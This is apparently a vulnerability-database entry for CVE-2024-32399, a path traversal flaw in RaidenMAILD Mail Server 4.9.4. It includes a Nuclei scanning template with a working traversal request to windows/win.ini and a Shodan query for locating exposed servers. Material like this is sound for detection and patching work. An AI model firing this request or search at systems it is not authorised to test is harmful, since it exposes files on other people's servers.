漏洞描述
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
CVE-2024-32399: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
PoC代码[已公开]
id: CVE-2024-32399
info:
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
author: DhiyaneshDK
severity: high
description: |
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
reference:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
- https://github.com/NN0b0dy/CVE-2024-32399
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
epss-score: 0.85263
epss-percentile: 0.99316
cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"RaidenMAILD"
product: raidenmaild
vendor: raidenmaild
tags: cve,cve2024,lfi,raiden,mail,server,vuln
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100c91b78ad861d834ae1775ffc9b7245190082ac1be96bae52a0e086032d4dcd21022100ce73b7e551abf00973b85daf77e39d7fd84d7af03700b9a499cc6c1366401788:922c64590222798bb761d5b6d8e72950